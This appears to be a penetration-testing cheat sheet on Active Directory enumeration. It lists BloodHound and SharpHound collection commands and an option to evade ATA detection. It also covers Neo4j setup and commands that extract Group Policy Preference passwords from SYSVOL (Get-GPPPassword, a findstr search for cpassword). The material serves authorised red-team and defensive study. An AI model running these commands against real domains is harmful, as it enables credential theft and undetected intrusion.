BloodHound Enumeration
BloodHound
Enable Sharp-Hound

Supply data to BloodHound
The generated archive can be uploaded to the BloodHound application.
Remote BloodHound
bloodhound-python -u <UserName> -p <Password> -ns <Domain Controller's Ip> -d <Domain> -c All
bloodhound-python -u user -p password -ns 192.168.1.5 -d hacktor.local -c All
On-Site BloodHound
#Using exe investor
.\SharpHound.exe --CollectionMethod All --LdapUsername <UserName> --LdapPassword <Password> --domain <Domain> --domaincontroller <Domain Controller's Ip> --OutputDirectory <PathToFile>
.\SharpHound.exe All
#Using PowerShell module investor
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All --LdapUsername <UserName> --LdapPassword <Password> --OutputDirectory <PathToFile>
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All,LoggedOn
To avoid detections like ATA
Invoke-BloodHound -CollectionMethod All -ExcludeDC
Neo4j
Start neo4j and BloodHound UI on kali machine and load the zip/json files
sudo neo4j start
if you found win server lessThan 2016 like as 2012 R2 or less you can use these commands to show local users
this option (Local user) unavailable on win server 2016
#To show password # from powersploit
Get-GPPPassword -Server PDC.wargrey.mon
#also to show password from sysvol in winServer2012
findstr /S /I cpassword \\PDC\sysvol\wargrey.mon\Policies\*.xml
Last updated